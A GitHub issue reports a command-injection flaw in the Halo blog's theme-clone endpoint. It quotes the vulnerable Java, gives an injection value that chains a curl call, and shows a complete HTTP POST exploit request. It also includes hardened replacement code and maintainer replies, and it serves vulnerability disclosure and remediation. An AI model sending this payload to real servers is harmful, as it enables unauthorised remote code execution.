
Remote Code Execution in your system #134

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments

@Artemis1029

Artemis1029 commented Apr 4, 2019

I confirm that I have checked (mark with [ ][x])


I am requesting (mark with [ ][x])

  • Bug report
  • Adding a new feature or function
  • Requesting technical support

Bug Report

I read the code and found that the function cloneFromRemote has a system call as

```java
@PostMapping(value = "/clone")
@ResponseBody
public JsonResult cloneFromRemote(@RequestParam(value = "remoteAddr") String remoteAddr,
                                  @RequestParam(value = "themeName") String themeName) {
    if (StrUtil.isBlank(remoteAddr) || StrUtil.isBlank(themeName)) {
        return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.info-no-complete"));
    }
    try {
        final File basePath = new File(ResourceUtils.getURL("classpath:").getPath());
        final File themePath = new File(basePath.getAbsolutePath(), "templates/themes");
        // both request parameters are concatenated unmodified into the command string
        final String cmdResult = RuntimeUtil.execForStr("git clone " + remoteAddr + " " + themePath.getAbsolutePath() + "/" + themeName);
        if (NOT_FOUND_GIT.equals(cmdResult)) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.theme.no-git"));
        }
        THEMES.clear();
        THEMES = HaloUtils.getThemes();
    } catch (FileNotFoundException e) {
        log.error("Cloning theme failed: {}", e.getMessage());
        return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.theme.clone-theme-failed") + e.getMessage());
    }
    return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.install-success"));
}
```

in

```java
final String cmdResult = RuntimeUtil.execForStr("git clone " + remoteAddr + " " + themePath.getAbsolutePath() + "/" + themeName);
```

and you do nothing with the remoteAddr and themeName, so I can type in

```
remoteAddr=a & curl xxx.xxx.xxx # 
themeName = 2333
```

and cmdString is

```
git clone a & cmd # xxxxxx
# cmd is your command
```

to get RCE

```http
POST /admin/themes/clone HTTP/1.1
Host: *******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: *******
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close
Cookie: 
X-Forwarded-For: 127.0.0.2

remoteAddr=a+%26+curl+111111111%3A1339%23&themeName=aaa
```
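As an added example (not Halo's code and not part of the report above), one way to harden this endpoint: allowlist both parameters, keep the clone target inside the themes directory, and hand git an argv list through ProcessBuilder so no shell ever parses the values. The class and method names (SafeThemeClone, buildCloneCommand, runClone) and the patterns are my own choices.

```java
import java.nio.file.Path;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical hardening of the theme clone endpoint; not the project's code.
public final class SafeThemeClone {
    // A theme name is a single path segment: no "/", no ".", so no traversal.
    private static final Pattern THEME_NAME = Pattern.compile("^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$");
    // Only http(s) remotes with a plain host, optional port and a simple path.
    private static final Pattern REMOTE =
        Pattern.compile("^https?://[A-Za-z0-9.-]+(:[0-9]+)?(/[A-Za-z0-9._/-]*)?$");

    /** Returns the argv for git clone, or throws if either parameter is unsafe. */
    static List<String> buildCloneCommand(Path themesDir, String remoteAddr, String themeName) {
        if (remoteAddr == null || !REMOTE.matcher(remoteAddr).matches()) {
            throw new IllegalArgumentException("remoteAddr must be a plain http(s) URL");
        }
        if (themeName == null || !THEME_NAME.matcher(themeName).matches()) {
            throw new IllegalArgumentException("themeName must be a simple directory name");
        }
        Path target = themesDir.resolve(themeName).normalize();
        if (!target.startsWith(themesDir)) {   // defence in depth against traversal
            throw new IllegalArgumentException("themeName escapes the themes directory");
        }
        // One argv entry per element: "--" ends option parsing so the URL cannot be read
        // as a git option, and nothing here is ever interpreted by a shell.
        return List.of("git", "clone", "--", remoteAddr, target.toString());
    }

    static String runClone(Path themesDir, String remoteAddr, String themeName) throws Exception {
        List<String> argv = buildCloneCommand(themesDir, remoteAddr, themeName);
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        String out = new String(p.getInputStream().readAllBytes());
        if (p.waitFor() != 0) throw new IllegalStateException("git clone failed: " + out);
        return out;
    }

    public static void main(String[] args) {
        Path dir = Path.of("templates", "themes").toAbsolutePath();
        // The decoded payload from the report is rejected before any process starts.
        try {
            buildCloneCommand(dir, "a & curl 111111111:1339#", "aaa");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        // A well-formed request yields a fixed argv with no shell in the path.
        System.out.println(buildCloneCommand(dir, "https://example.invalid/team/theme.git", "my-theme"));
    }
}
```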
@ruibaby ruibaby added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@ruibaby
Member

ruibaby commented Apr 4, 2019

Ok, we will start to solve these problems, thank you very much for your feedback.

@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
@ruibaby
Member

ruibaby commented May 28, 2019

Preparing to release v1, so closing this issue.

@ruibaby ruibaby closed this as completed May 28, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
Bumps [vuex](https://github.com/vuejs/vuex) from 3.1.3 to 3.3.0.
- [Release notes](https://github.com/vuejs/vuex/releases)
- [Changelog](https://github.com/vuejs/vuex/blob/dev/CHANGELOG.md)
- [Commits](vuejs/vuex@v3.1.3...v3.3.0)

Signed-off-by: dependabot-preview[bot] <support@dependabot.com>

Co-authored-by: dependabot-preview[bot] <27856297+dependabot-preview[bot]@users.noreply.github.com>